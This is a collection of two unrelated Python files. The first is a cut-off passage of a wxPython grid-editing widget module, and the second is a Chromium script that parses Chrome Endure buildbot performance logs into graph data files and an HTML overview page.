x, y = grid.CalcUnscrolledPosition(event.GetX(),event.GetY())
coords = grid.XYToCell(x, y)
col = coords[1]
row = coords[0]
# creates tooltip message for cells with long values
# note: this works with EPD for windows, and modern wxPython, but not with Canopy Python
msg = grid.GetCellValue(row, col)
if len(msg) > 15:
event.GetEventObject().SetToolTipString(msg)
else:
event.GetEventObject().SetToolTipString('')
def on_edit_grid(self, event, grid):
sets self.changes to true when user edits the grid.
provides down and up key functionality for exiting the editor
if not self.changes:
self.changes = {event.Row}
else:
self.changes.add(event.Row)
#self.changes = True
try:
editor = event.GetControl()
editor.Bind(wx.EVT_KEY_DOWN, lambda event: self.onEditorKey(event, grid))
except AttributeError: # if it's a EVT_GRID_EDITOR_SHOWN, it doesn't have the GetControl method
pass
def onEditorKey(self, event, grid):
keycode = event.GetKeyCode()
if keycode == wx.WXK_UP:
grid.MoveCursorUp(False)
grid.MoveCursorDown(False)# have this in because otherwise cursor moves up 2 rows
elif keycode == wx.WXK_DOWN:
grid.MoveCursorDown(False)
grid.MoveCursorUp(False) # have this in because otherwise cursor moves down 2 rows
#elif keycode == wx.WXK_LEFT:
# grid.MoveCursorLeft(False)
#elif keycode == wx.WXK_RIGHT:
# grid.MoveCursorRight(False)
else:
pass
event.Skip()
"""
def remove_starred_labels(self):#, grid):
cols_with_stars = []
cols_with_hats = []
for col in range(self.GetNumberCols()):
label = self.GetColLabelValue(col)
if '**' in label:
self.SetColLabelValue(col, label.strip('**'))
cols_with_stars.append(col)
if '^^' in label:
self.SetColLabelValue(col, label.strip('^^'))
cols_with_hats.append(col)
return cols_with_stars, cols_with_hats
def paint_invalid_row(self, row, color="LIGHT BLUE"):
self.SetRowLabelRenderer(row, MyRowLabelRenderer(color))
def paint_invalid_cell(self, row, col, color='MEDIUM VIOLET RED',
skip_cell=False):
"""
Take row, column, and turn it color
"""
self.SetColLabelRenderer(col, MyColLabelRenderer('#1101e0'))
self.SetRowLabelRenderer(row, MyRowLabelRenderer('#1101e0'))
# SetCellRenderer doesn't work with table-based grid (HugeGrid class)
if not skip_cell:
self.SetCellRenderer(row, col, MyCustomRenderer(color))
class MagicGrid(BaseMagicGrid):
"""
grid class
"""
def __init__(self, parent, name, row_labels, col_labels, size=0):
super(MagicGrid, self).__init__(parent, name, row_labels, col_labels, size=0)
def InitUI(self):
data = []
num_rows = len(self.row_labels)
num_cols = len(self.col_labels)
self.ClearGrid()
self.CreateGrid(num_rows, num_cols)
for n, row in enumerate(self.row_labels):
self.SetRowLabelValue(n, str(n+1))
self.SetCellValue(n, 0, row)
data.append(row)
# set column labels
for n, col in enumerate(self.col_labels):
self.SetColLabelValue(n, str(col))
# set scrollbars
self.set_scrollbars()
def add_col(self, label):
"""
Add a new column to the grid.
Resize grid to display the column.
Parameters
----------
label : str
Returns
---------
last_col: int
index column number of added col
"""
self.AppendCols(1, updateLabels=False)
last_col = self.GetNumberCols() - 1
self.SetColLabelValue(last_col, label)
self.col_labels.append(label)
self.size_grid()
return last_col
def add_items(self, dataframe, hide_cols=()):
"""
Add items and/or update existing items in grid
"""
# replace "None" values with ""
dataframe = dataframe.fillna("")
# remove any columns that shouldn't be shown
for col in hide_cols:
if col in dataframe.columns:
del dataframe[col]
# add more rows
self.AppendRows(len(dataframe))
columns = dataframe.columns
row_num = -1
# fill in all rows with appropriate values
for ind, row in dataframe.iterrows():
row_num += 1
for col_num, col in enumerate(columns):
value = row[col]
self.SetCellValue(row_num, col_num, str(value))
# set citation default value
if col == 'citations':
citation = row['citations']
if (citation is None) or (citation is np.nan):
self.SetCellValue(row_num, col_num, 'This study')
else:
if 'This study' not in citation:
if len(citation):
citation += ':'
citation += 'This study'
self.SetCellValue(row_num, col_num, citation)
self.row_labels.extend(dataframe.index)
def save_items(self, rows=None, verbose=False):
"""
Return a dictionary of row data for selected rows:
{1: {col1: val1, col2: val2}, ...}
If a list of row numbers isn't provided, get data for all.
"""
if rows:
rows = rows
else:
rows = range(self.GetNumberRows())
cols = range(self.GetNumberCols())
data = {}
for row in rows:
data[row] = {}
for col in cols:
col_name = self.GetColLabelValue(col)
if verbose:
print(col_name, ":", self.GetCellValue(row, col))
data[row][col_name] = self.GetCellValue(row, col)
return data
class HugeMagicGrid(BaseMagicGrid):
def __init__(self, parent, name, row_labels, col_labels, size=0):
super(HugeMagicGrid, self).__init__(parent, name, row_labels, col_labels, size=0)
# add table
table = HugeTable(sys.stdout, len(row_labels), len(col_labels))
self.table = table
# The second parameter means that the grid is to take ownership of the
# table and will destroy it when done. Otherwise you would need to keep
# a reference to it and call it's Destroy method later.
self.SetTable(table, True)
self.Bind(gridlib.EVT_GRID_CELL_RIGHT_CLICK, self.OnRightDown)
#self.InitUI()
def InitUI(self):
self.size_grid()
def add_items(self, dataframe, hide_cols=()):
# replace "None" values with ""
dataframe = dataframe.fillna("")
# remove any columns that shouldn't be shown
for col in hide_cols:
if col in dataframe.columns:
del dataframe[col]
self.table.dataframe = dataframe
def save_items(self):
"""
Return dataframe so that a contribution can update
"""
return self.table.dataframe
def SetColumnValues(self, col, data):
"""
Set a whole column worth of values
in self.table
"""
self.table.SetColumnValues(col, data)
def add_col(self, label):
"""
Update table dataframe, and append a new column
Parameters
----------
label : str
Returns
---------
last_col: int
index column number of added col
"""
self.table.dataframe[label] = ''
self.AppendCols(1, updateLabels=False)
last_col = self.table.GetNumberCols() - 1
self.SetColLabelValue(last_col, label)
self.col_labels.append(label)
self.size_grid()
return last_col
# this currently fails with segfault
def remove_col(self, col_num):
"""
update table dataframe, and remove a column.
resize grid to display correctly
"""
label_value = self.GetColLabelValue(col_num).strip('**').strip('^^')
self.col_labels.remove(label_value)
del self.table.dataframe[label_value]
result = self.DeleteCols(pos=col_num, numCols=1, updateLabels=True)
self.size_grid()
return result
def OnRightDown(self, event):
print(self.GetSelectedRows())
class MyCustomRenderer(gridlib.GridCellRenderer):
def __init__(self, color='MEDIUM VIOLET RED'):
gridlib.GridCellRenderer.__init__(self)
self.color = color
def Draw(self, grid, attr, dc, rect, row, col, isSelected):
#print 'grid', grid
#print 'attr', attr
#print 'dc', dc
#print 'rect', rect
#print 'row', row
#print 'col', col
#print 'isSelected', isSelected
#dc.SetPen(wx.TRANSPARENT_PEN)
# do it like this for filling in background:
dc.SetBackgroundMode(wx.SOLID)
dc.SetBrush(wx.Brush(self.color, wx.BDIAGONAL_HATCH))
# or do it like this for highlighting the cell:
#dc.SetPen(wx.Pen(self.color, 5, wx.SOLID))
dc.DrawRectangle(rect)
dc.SetBackgroundMode(wx.TRANSPARENT)
dc.SetFont(attr.GetFont())
text = grid.GetCellValue(row, col)
#colors = ["RED", "WHITE", "SKY BLUE"]
x = rect.x + 1
y = rect.y + 1
for ch in text:
dc.SetTextForeground("BLACK")
dc.DrawText(ch, x, y)
w, h = dc.GetTextExtent(ch)
x = x + w
if x > rect.right - 5:
break
def GetBestSize(self, grid, attr, dc, row, col):
text = grid.GetCellValue(row, col)
dc.SetFont(attr.GetFont())
w, h = dc.GetTextExtent(text)
return wx.Size(w, h)
def Clone(self):
return MyCustomRenderer()
class MyColLabelRenderer(gridlabelrenderer.GridLabelRenderer):
def __init__(self, bgcolor):
self._bgcolor = bgcolor
def Draw(self, grid, dc, rect, col):
dc.SetBrush(wx.Brush(self._bgcolor))
dc.SetBrush(wx.TRANSPARENT_BRUSH)
#dc.SetPen(wx.TRANSPARENT_PEN)
dc.SetPen(wx.Pen('blue', 5, wx.DOT_DASH))
dc.DrawRectangle(rect)
hAlign, vAlign = grid.GetColLabelAlignment()
text = grid.GetColLabelValue(col)
self.DrawBorder(grid, dc, rect)
self.DrawText(grid, dc, rect, text, hAlign, vAlign)
class MyRowLabelRenderer(gridlabelrenderer.GridLabelRenderer):
def __init__(self, bgcolor):
self._bgcolor = bgcolor
def Draw(self, grid, dc, rect, row):
#dc.SetBrush(wx.Brush(self._bgcolor))
dc.SetBrush(wx.TRANSPARENT_BRUSH)
dc.SetPen(wx.Pen('blue', 5, wx.SHORT_DASH))
#dc.SetPen(wx.TRANSPARENT_PEN)
dc.DrawRectangle(rect)
hAlign, vAlign = grid.GetRowLabelAlignment()
text = grid.GetRowLabelValue(row)
self.DrawBorder(grid, dc, rect)
self.DrawText(grid, dc, rect, text, hAlign, vAlign)
|
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Script to parse perf data from Chrome Endure test executions, to be graphed.
This script connects via HTTP to a buildbot master in order to scrape and parse
perf data from Chrome Endure tests that have been run. The perf data is then
stored in local text files to be graphed by the Chrome Endure graphing code.
It is assumed that any Chrome Endure tests that show up on the waterfall have
names that are of the following form:
"endure_<webapp_name>-<test_name>" (non-Web Page Replay tests)
or
"endure_<webapp_name>_wpr-<test_name>" (Web Page Replay tests)
For example: "endure_gmail_wpr-testGmailComposeDiscard"
This script accepts either a URL or a local path as a buildbot location.
It switches its behavior if a URL is given, or a local path is given.
When a URL is given, it gets buildbot logs from the buildbot builders URL
e.g. http://build.chromium.org/p/chromium.endure/builders/.
When a local path is given, it gets buildbot logs from buildbot's internal
files in the directory e.g. /home/chrome-bot/buildbot.
"""
import cPickle
import getpass
import logging
import optparse
import os
import re
import simplejson
import socket
import string
import sys
import time
import urllib
import urllib2
CHROME_ENDURE_SLAVE_NAMES = [
'Linux QA Perf (0)',
'Linux QA Perf (1)',
'Linux QA Perf (2)',
'Linux QA Perf (3)',
'Linux QA Perf (4)',
'Linux QA Perf (dbg)(0)',
'Linux QA Perf (dbg)(1)',
'Linux QA Perf (dbg)(2)',
'Linux QA Perf (dbg)(3)',
'Linux QA Perf (dbg)(4)',
]
BUILDER_URL_BASE = 'http://build.chromium.org/p/chromium.endure/builders/'
LAST_BUILD_NUM_PROCESSED_FILE = os.path.join(os.path.dirname(__file__),
'_parser_last_processed.txt')
LOCAL_GRAPH_DIR = '/home/%s/www/chrome_endure_clean' % getpass.getuser()
MANGLE_TRANSLATION = string.maketrans(' ()', '___')
def SetupBaseGraphDirIfNeeded(webapp_name, test_name, dest_dir):
"""Sets up the directory containing results for a particular test, if needed.
Args:
webapp_name: The string name of the webapp associated with the given test.
test_name: The string name of the test.
dest_dir: The name of the destination directory that needs to be set up.
"""
if not os.path.exists(dest_dir):
os.mkdir(dest_dir) # Test name directory.
os.chmod(dest_dir, 0755)
# Create config file.
config_file = os.path.join(dest_dir, 'config.js')
if not os.path.exists(config_file):
with open(config_file, 'w') as f:
f.write('var Config = {\n')
f.write('buildslave: "Chrome Endure Bots",\n')
f.write('title: "Chrome Endure %s Test: %s",\n' % (webapp_name.upper(),
test_name))
f.write('};\n')
os.chmod(config_file, 0755)
# Set up symbolic links to the real graphing files.
link_file = os.path.join(dest_dir, 'index.html')
if not os.path.exists(link_file):
os.symlink('../../endure_plotter.html', link_file)
link_file = os.path.join(dest_dir, 'endure_plotter.js')
if not os.path.exists(link_file):
os.symlink('../../endure_plotter.js', link_file)
link_file = os.path.join(dest_dir, 'js')
if not os.path.exists(link_file):
os.symlink('../../js', link_file)
def WriteToDataFile(new_line, existing_lines, revision, data_file):
"""Writes a new entry to an existing perf data file to be graphed.
If there's an existing line with the same revision number, overwrite its data
with the new line. Else, prepend the info for the new revision.
Args:
new_line: A dictionary representing perf information for the new entry.
existing_lines: A list of string lines from the existing perf data file.
revision: The string revision number associated with the new perf entry.
data_file: The string name of the perf data file to which to write.
"""
overwritten = False
for i, line in enumerate(existing_lines):
line_dict = simplejson.loads(line)
if line_dict['rev'] == revision:
existing_lines[i] = simplejson.dumps(new_line)
overwritten = True
break
elif int(line_dict['rev']) < int(revision):
break
if not overwritten:
existing_lines.insert(0, simplejson.dumps(new_line))
with open(data_file, 'w') as f:
f.write('\n'.join(existing_lines))
os.chmod(data_file, 0755)
def OutputPerfData(revision, graph_name, values, units, units_x, dest_dir,
is_stacked=False, stack_order=[]):
"""Outputs perf data to a local text file to be graphed.
Args:
revision: The string revision number associated with the perf data.
graph_name: The string name of the graph on which to plot the data.
values: A dict which maps a description to a value. A value is either a
single data value to be graphed, or a list of 2-tuples
representing (x, y) points to be graphed for long-running tests.
units: The string description for the y-axis units on the graph.
units_x: The string description for the x-axis units on the graph. Should
be set to None if the results are not for long-running graphs.
dest_dir: The name of the destination directory to which to write.
is_stacked: True to draw a "stacked" graph. First-come values are
stacked at bottom by default.
stack_order: A list that contains key strings in the order to stack values
in the graph.
"""
# Update graphs.dat, which contains metadata associated with each graph.
existing_graphs = []
graphs_file = os.path.join(dest_dir, 'graphs.dat')
if os.path.exists(graphs_file):
with open(graphs_file, 'r') as f:
existing_graphs = simplejson.loads(f.read())
is_new_graph = True
for graph in existing_graphs:
if graph['name'] == graph_name:
is_new_graph = False
break
if is_new_graph:
new_graph = {
'name': graph_name,
'units': units,
'important': False,
}
if units_x:
new_graph['units_x'] = units_x
existing_graphs.append(new_graph)
existing_graphs = sorted(existing_graphs, key=lambda x: x['name'])
with open(graphs_file, 'w') as f:
f.write(simplejson.dumps(existing_graphs, indent=2))
os.chmod(graphs_file, 0755)
# Update summary data file, containing the actual data to be graphed.
data_file_name = graph_name + '-summary.dat'
existing_lines = []
data_file = os.path.join(dest_dir, data_file_name)
if os.path.exists(data_file):
with open(data_file, 'r') as f:
existing_lines = f.readlines()
existing_lines = map(lambda x: x.strip(), existing_lines)
new_traces = {}
for description in values:
value = values[description]
if units_x:
points = []
for point in value:
points.append([str(point[0]), str(point[1])])
new_traces[description] = points
else:
new_traces[description] = [str(value), str(0.0)]
new_line = {
'traces': new_traces,
'rev': revision
}
if is_stacked:
new_line['stack'] = True
new_line['stack_order'] = stack_order
WriteToDataFile(new_line, existing_lines, revision, data_file)
def OutputEventData(revision, event_dict, dest_dir):
"""Outputs event data to a local text file to be graphed.
Args:
revision: The string revision number associated with the event data.
event_dict: A dict which maps a description to an array of tuples
representing event data to be graphed.
dest_dir: The name of the destination directory to which to write.
"""
data_file_name = '_EVENT_-summary.dat'
existing_lines = []
data_file = os.path.join(dest_dir, data_file_name)
if os.path.exists(data_file):
with open(data_file, 'r') as f:
existing_lines = f.readlines()
existing_lines = map(lambda x: x.strip(), existing_lines)
new_events = {}
for description in event_dict:
event_list = event_dict[description]
value_list = []
for event_time, event_data in event_list:
value_list.append([str(event_time), event_data])
new_events[description] = value_list
new_line = {
'rev': revision,
'events': new_events
}
WriteToDataFile(new_line, existing_lines, revision, data_file)
def UpdatePerfDataFromFetchedContent(
revision, content, webapp_name, test_name, graph_dir, only_dmp=False):
"""Update perf data from fetched stdio data.
Args:
revision: The string revision number associated with the new perf entry.
content: Fetched stdio data.
webapp_name: A name of the webapp.
test_name: A name of the test.
graph_dir: A path to the graph directory.
only_dmp: True if only Deep Memory Profiler results should be used.
"""
perf_data_raw = []
def AppendRawPerfData(graph_name, description, value, units, units_x,
webapp_name, test_name, is_stacked=False):
perf_data_raw.append({
'graph_name': graph_name,
'description': description,
'value': value,
'units': units,
'units_x': units_x,
'webapp_name': webapp_name,
'test_name': test_name,
'stack': is_stacked,
})
# First scan for short-running perf test results.
for match in re.findall(
r'RESULT ([^:]+): ([^=]+)= ([-\d\.]+) (\S+)', content):
if (not only_dmp) or match[0].endswith('-DMP'):
try:
match2 = eval(match[2])
except SyntaxError:
match2 = None
if match2:
AppendRawPerfData(match[0], match[1], match2, match[3], None,
webapp_name, webapp_name)
# Next scan for long-running perf test results.
for match in re.findall(
r'RESULT ([^:]+): ([^=]+)= (\[[^\]]+\]) (\S+) (\S+)', content):
if (not only_dmp) or match[0].endswith('-DMP'):
try:
match2 = eval(match[2])
except SyntaxError:
match2 = None
# TODO(dmikurube): Change the condition to use stacked graph when we
# determine how to specify it.
if match2:
AppendRawPerfData(match[0], match[1], match2, match[3], match[4],
webapp_name, test_name, match[0].endswith('-DMP'))
# Next scan for events in the test results.
for match in re.findall(
r'RESULT _EVENT_: ([^=]+)= (\[[^\]]+\])', content):
try:
match1 = eval(match[1])
except SyntaxError:
match1 = None
if match1:
AppendRawPerfData('_EVENT_', match[0], match1, None, None,
webapp_name, test_name)
# For each graph_name/description pair that refers to a long-running test
# result or an event, concatenate all the results together (assume results
# in the input file are in the correct order). For short-running test
# results, keep just one if more than one is specified.
perf_data = {} # Maps a graph-line key to a perf data dictionary.
for data in perf_data_raw:
key_graph = data['graph_name']
key_description = data['description']
if not key_graph in perf_data:
perf_data[key_graph] = {
'graph_name': data['graph_name'],
'value': {},
'units': data['units'],
'units_x': data['units_x'],
'webapp_name': data['webapp_name'],
'test_name': data['test_name'],
}
perf_data[key_graph]['stack'] = data['stack']
if 'stack_order' not in perf_data[key_graph]:
perf_data[key_graph]['stack_order'] = []
if (data['stack'] and
data['description'] not in perf_data[key_graph]['stack_order']):
perf_data[key_graph]['stack_order'].append(data['description'])
if data['graph_name'] != '_EVENT_' and not data['units_x']:
# Short-running test result.
perf_data[key_graph]['value'][key_description] = data['value']
else:
# Long-running test result or event.
if key_description in perf_data[key_graph]['value']:
perf_data[key_graph]['value'][key_description] += data['value']
else:
perf_data[key_graph]['value'][key_description] = data['value']
# Finally, for each graph-line in |perf_data|, update the associated local
# graph data files if necessary.
for perf_data_key in perf_data:
perf_data_dict = perf_data[perf_data_key]
dest_dir = os.path.join(graph_dir, perf_data_dict['webapp_name'])
if not os.path.exists(dest_dir):
os.mkdir(dest_dir) # Webapp name directory.
os.chmod(dest_dir, 0755)
dest_dir = os.path.join(dest_dir, perf_data_dict['test_name'])
SetupBaseGraphDirIfNeeded(perf_data_dict['webapp_name'],
perf_data_dict['test_name'], dest_dir)
if perf_data_dict['graph_name'] == '_EVENT_':
OutputEventData(revision, perf_data_dict['value'], dest_dir)
else:
OutputPerfData(revision, perf_data_dict['graph_name'],
perf_data_dict['value'],
perf_data_dict['units'], perf_data_dict['units_x'],
dest_dir,
perf_data_dict['stack'], perf_data_dict['stack_order'])
def SlaveLocation(master_location, slave_info):
"""Returns slave location for |master_location| and |slave_info|."""
if master_location.startswith('http://'):
return master_location + urllib.quote(slave_info['slave_name'])
else:
return os.path.join(master_location,
slave_info['slave_name'].translate(MANGLE_TRANSLATION))
def GetRevisionAndLogs(slave_location, build_num):
"""Get a revision number and log locations.
Args:
slave_location: A URL or a path to the build slave data.
build_num: A build number.
Returns:
A pair of the revision number and a list of strings that contain locations
of logs. (False, []) in case of error.
"""
if slave_location.startswith('http://'):
location = slave_location + '/builds/' + str(build_num)
else:
location = os.path.join(slave_location, str(build_num))
revision = False
logs = []
fp = None
try:
if location.startswith('http://'):
fp = urllib2.urlopen(location)
contents = fp.read()
revisions = re.findall(r'<td class="left">got_revision</td>\s+'
'<td>(\d+)</td>\s+<td>Source</td>', contents)
if revisions:
revision = revisions[0]
logs = [location + link + '/text' for link
in re.findall(r'(/steps/endure[^/]+/logs/stdio)', contents)]
else:
fp = open(location, 'rb')
build = cPickle.load(fp)
properties = build.getProperties()
if properties.has_key('got_revision'):
revision = build.getProperty('got_revision')
candidates = os.listdir(slave_location)
logs = [os.path.join(slave_location, filename)
for filename in candidates
if re.match(r'%d-log-endure[^/]+-stdio' % build_num, filename)]
except urllib2.URLError, e:
logging.exception('Error reading build URL "%s": %s', location, str(e))
return False, []
except (IOError, OSError), e:
logging.exception('Error reading build file "%s": %s', location, str(e))
return False, []
finally:
if fp:
fp.close()
return revision, logs
def ExtractTestNames(log_location, is_dbg):
"""Extract test names from |log_location|.
Returns:
A dict of a log location, webapp's name and test's name. False if error.
"""
if log_location.startswith('http://'):
location = urllib.unquote(log_location)
test_pattern = r'endure_([^_]+)(_test |-)([^/]+)/'
wpr_test_pattern = r'endure_([^_]+)_wpr(_test |-)([^/]+)/'
else:
location = log_location
test_pattern = r'endure_([^_]+)(_test_|-)([^/]+)-stdio'
wpr_test_pattern = 'endure_([^_]+)_wpr(_test_|-)([^/]+)-stdio'
found_wpr_result = False
match = re.findall(test_pattern, location)
if not match:
match = re.findall(wpr_test_pattern, location)
if match:
found_wpr_result = True
else:
logging.error('Test name not in expected format: ' + location)
return False
match = match[0]
webapp_name = match[0] + '_wpr' if found_wpr_result else match[0]
webapp_name = webapp_name + '_dbg' if is_dbg else webapp_name
test_name = match[2]
return {
'location': log_location,
'webapp_name': webapp_name,
'test_name': test_name,
}
def GetStdioContents(stdio_location):
"""Gets appropriate stdio contents.
Returns:
A content string of the stdio log. None in case of error.
"""
fp = None
contents = ''
try:
if stdio_location.startswith('http://'):
fp = urllib2.urlopen(stdio_location, timeout=60)
# Since in-progress test output is sent chunked, there's no EOF. We need
# to specially handle this case so we don't hang here waiting for the
# test to complete.
start_time = time.time()
while True:
data = fp.read(1024)
if not data:
break
contents += data
if time.time() - start_time >= 30: # Read for at most 30 seconds.
break
else:
fp = open(stdio_location)
data = fp.read()
contents = ''
index = 0
# Buildbot log files are stored in the netstring format.
# http://en.wikipedia.org/wiki/Netstring
while index < len(data):
index2 = index
while data[index2].isdigit():
index2 += 1
if data[index2] != ':':
logging.error('Log file is not in expected format: %s' %
stdio_location)
contents = None
break
length = int(data[index:index2])
index = index2 + 1
channel = int(data[index])
index += 1
if data[index+length-1] != ',':
logging.error('Log file is not in expected format: %s' %
stdio_location)
contents = None
break
if channel == 0:
contents += data[index:(index+length-1)]
index += length
except (urllib2.URLError, socket.error, IOError, OSError), e:
# Issue warning but continue to the next stdio link.
logging.warning('Error reading test stdio data "%s": %s',
stdio_location, str(e))
finally:
if fp:
fp.close()
return contents
def UpdatePerfDataForSlaveAndBuild(
slave_info, build_num, graph_dir, master_location):
"""Process updated perf data for a particular slave and build number.
Args:
slave_info: A dictionary containing information about the slave to process.
build_num: The particular build number on the slave to process.
graph_dir: A path to the graph directory.
master_location: A URL or a path to the build master data.
Returns:
True if the perf data for the given slave/build is updated properly, or
False if any critical error occurred.
"""
if not master_location.startswith('http://'):
# Source is a file.
from buildbot.status import builder
slave_location = SlaveLocation(master_location, slave_info)
logging.debug(' %s, build %d.', slave_info['slave_name'], build_num)
is_dbg = '(dbg)' in slave_info['slave_name']
revision, logs = GetRevisionAndLogs(slave_location, build_num)
if not revision:
return False
stdios = []
for log_location in logs:
stdio = ExtractTestNames(log_location, is_dbg)
if not stdio:
return False
stdios.append(stdio)
for stdio in stdios:
stdio_location = stdio['location']
contents = GetStdioContents(stdio_location)
if contents:
UpdatePerfDataFromFetchedContent(revision, contents,
stdio['webapp_name'],
stdio['test_name'],
graph_dir, is_dbg)
return True
def GetMostRecentBuildNum(master_location, slave_name):
"""Gets the most recent buld number for |slave_name| in |master_location|."""
most_recent_build_num = None
if master_location.startswith('http://'):
slave_url = master_location + urllib.quote(slave_name)
url_contents = ''
fp = None
try:
fp = urllib2.urlopen(slave_url, timeout=60)
url_contents = fp.read()
except urllib2.URLError, e:
logging.exception('Error reading builder URL: %s', str(e))
return None
finally:
if fp:
fp.close()
matches = re.findall(r'/(\d+)/stop', url_contents)
if matches:
most_recent_build_num = int(matches[0])
else:
matches = re.findall(r'#(\d+)</a></td>', url_contents)
if matches:
most_recent_build_num = sorted(map(int, matches), reverse=True)[0]
else:
slave_path = os.path.join(master_location,
slave_name.translate(MANGLE_TRANSLATION))
files = os.listdir(slave_path)
number_files = [int(filename) for filename in files if filename.isdigit()]
if number_files:
most_recent_build_num = sorted(number_files, reverse=True)[0]
if most_recent_build_num:
logging.debug('%s most recent build number: %s',
slave_name, most_recent_build_num)
else:
logging.error('Could not identify latest build number for slave %s.',
slave_name)
return most_recent_build_num
def UpdatePerfDataFiles(graph_dir, master_location):
"""Updates the Chrome Endure graph data files with the latest test results.
For each known Chrome Endure slave, we scan its latest test results looking
for any new test data. Any new data that is found is then appended to the
data files used to display the Chrome Endure graphs.
Args:
graph_dir: A path to the graph directory.
master_location: A URL or a path to the build master data.
Returns:
True if all graph data files are updated properly, or
False if any error occurred.
"""
slave_list = []
for slave_name in CHROME_ENDURE_SLAVE_NAMES:
slave_info = {}
slave_info['slave_name'] = slave_name
slave_info['most_recent_build_num'] = None
slave_info['last_processed_build_num'] = None
slave_list.append(slave_info)
# Identify the most recent build number for each slave.
logging.debug('Searching for latest build numbers for each slave...')
for slave in slave_list:
slave_name = slave['slave_name']
slave['most_recent_build_num'] = GetMostRecentBuildNum(
master_location, slave_name)
# Identify the last-processed build number for each slave.
logging.debug('Identifying last processed build numbers...')
if not os.path.exists(LAST_BUILD_NUM_PROCESSED_FILE):
for slave_info in slave_list:
slave_info['last_processed_build_num'] = 0
else:
with open(LAST_BUILD_NUM_PROCESSED_FILE, 'r') as fp:
file_contents = fp.read()
for match in re.findall(r'([^:]+):(\d+)', file_contents):
slave_name = match[0].strip()
last_processed_build_num = match[1].strip()
for slave_info in slave_list:
if slave_info['slave_name'] == slave_name:
slave_info['last_processed_build_num'] = int(
last_processed_build_num)
for slave_info in slave_list:
if not slave_info['last_processed_build_num']:
slave_info['last_processed_build_num'] = 0
logging.debug('Done identifying last processed build numbers.')
# For each Chrome Endure slave, process each build in-between the last
# processed build num and the most recent build num, inclusive. To process
# each one, first get the revision number for that build, then scan the test
# result stdio for any performance data, and add any new performance data to
# local files to be graphed.
for slave_info in slave_list:
logging.debug('Processing %s, builds %d-%d...',
slave_info['slave_name'],
slave_info['last_processed_build_num'],
slave_info['most_recent_build_num'])
curr_build_num = slave_info['last_processed_build_num']
while curr_build_num <= slave_info['most_recent_build_num']:
if not UpdatePerfDataForSlaveAndBuild(slave_info, curr_build_num,
graph_dir, master_location):
# Do not give up. The first files might be removed by buildbot.
logging.warning('Logs do not exist in buildbot for #%d of %s.' %
(curr_build_num, slave_info['slave_name']))
curr_build_num += 1
# Log the newly-processed build numbers.
logging.debug('Logging the newly-processed build numbers...')
with open(LAST_BUILD_NUM_PROCESSED_FILE, 'w') as f:
for slave_info in slave_list:
f.write('%s:%s\n' % (slave_info['slave_name'],
slave_info['most_recent_build_num']))
return True
def GenerateIndexPage(graph_dir):
"""Generates a summary (landing) page for the Chrome Endure graphs.
Args:
graph_dir: A path to the graph directory.
"""
logging.debug('Generating new index.html page...')
# Page header.
page = """
<html>
<head>
<title>Chrome Endure Overview</title>
<script language="javascript">
function DisplayGraph(name, graph) {
document.write(
'<td><iframe scrolling="no" height="438" width="700" src="');
document.write(name);
document.write('"></iframe></td>');
}
</script>
</head>
<body>
<center>
<h1>
Chrome Endure
</h1>
"""
# Print current time.
page += '<p>Updated: %s</p>\n' % (
time.strftime('%A, %B %d, %Y at %I:%M:%S %p %Z'))
# Links for each webapp.
webapp_names = [x for x in os.listdir(graph_dir) if
x not in ['js', 'old_data', '.svn', '.git'] and
os.path.isdir(os.path.join(graph_dir, x))]
webapp_names = sorted(webapp_names)
page += '<p> ['
for i, name in enumerate(webapp_names):
page += '<a href="#%s">%s</a>' % (name.upper(), name.upper())
if i < len(webapp_names) - 1:
page += ' | '
page += '] </p>\n'
# Print out the data for each webapp.
for webapp_name in webapp_names:
page += '\n<h1 id="%s">%s</h1>\n' % (webapp_name.upper(),
webapp_name.upper())
# Links for each test for this webapp.
test_names = [x for x in
os.listdir(os.path.join(graph_dir, webapp_name))]
test_names = sorted(test_names)
page += '<p> ['
for i, name in enumerate(test_names):
page += '<a href="#%s">%s</a>' % (name, name)
if i < len(test_names) - 1:
page += ' | '
page += '] </p>\n'
# Print out the data for each test for this webapp.
for test_name in test_names:
# Get the set of graph names for this test.
graph_names = [x[:x.find('-summary.dat')] for x in
os.listdir(os.path.join(graph_dir,
webapp_name, test_name))
if '-summary.dat' in x and '_EVENT_' not in x]
graph_names = sorted(graph_names)
page += '<h2 id="%s">%s</h2>\n' % (test_name, test_name)
page += '<table>\n'
for i, graph_name in enumerate(graph_names):
if i % 2 == 0:
page += ' <tr>\n'
page += (' <script>DisplayGraph("%s/%s?graph=%s&lookout=1");'
'</script>\n' % (webapp_name, test_name, graph_name))
if i % 2 == 1:
page += ' </tr>\n'
if len(graph_names) % 2 == 1:
page += ' </tr>\n'
page += '</table>\n'
# Page footer.
page += """
</center>
</body>
</html>
"""
index_file = os.path.join(graph_dir, 'index.html')
with open(index_file, 'w') as f:
f.write(page)
os.chmod(index_file, 0755)
def main():
parser = optparse.OptionParser()
parser.add_option(
'-v', '--verbose', action='store_true', default=False,
help='Use verbose logging.')
parser.add_option(
'-s', '--stdin', action='store_true', default=False,
help='Input from stdin instead of slaves for testing this script.')
parser.add_option(
'-b', '--buildbot', dest='buildbot', metavar="BUILDBOT",
default=BUILDER_URL_BASE,
help='Use log files in a buildbot at BUILDBOT. BUILDBOT can be a '
'buildbot\'s builder URL or a local path to a buildbot directory. '
'Both an absolute path and a relative path are available, e.g. '
'"/home/chrome-bot/buildbot" or "../buildbot". '
'[default: %default]')
parser.add_option(
'-g', '--graph', dest='graph_dir', metavar="DIR", default=LOCAL_GRAPH_DIR,
help='Output graph data files to DIR. [default: %default]')
options, _ = parser.parse_args(sys.argv)
logging_level = logging.DEBUG if options.verbose else logging.INFO
logging.basicConfig(level=logging_level,
format='[%(asctime)s] %(levelname)s: %(message)s')
if options.stdin:
content = sys.stdin.read()
UpdatePerfDataFromFetchedContent(
'12345', content, 'webapp', 'test', options.graph_dir)
else:
if options.buildbot.startswith('http://'):
master_location = options.buildbot
else:
build_dir = os.path.join(options.buildbot, 'build')
third_party_dir = os.path.join(build_dir, 'third_party')
sys.path.append(third_party_dir)
sys.path.append(os.path.join(third_party_dir, 'buildbot_8_4p1'))
sys.path.append(os.path.join(third_party_dir, 'twisted_10_2'))
master_location = os.path.join(build_dir, 'masters',
'master.chromium.endure')
success = UpdatePerfDataFiles(options.graph_dir, master_location)
if not success:
logging.error('Failed to update perf data files.')
sys.exit(0)
GenerateIndexPage(options.graph_dir)
logging.debug('All done!')
if __name__ == '__main__':
main()
|
|
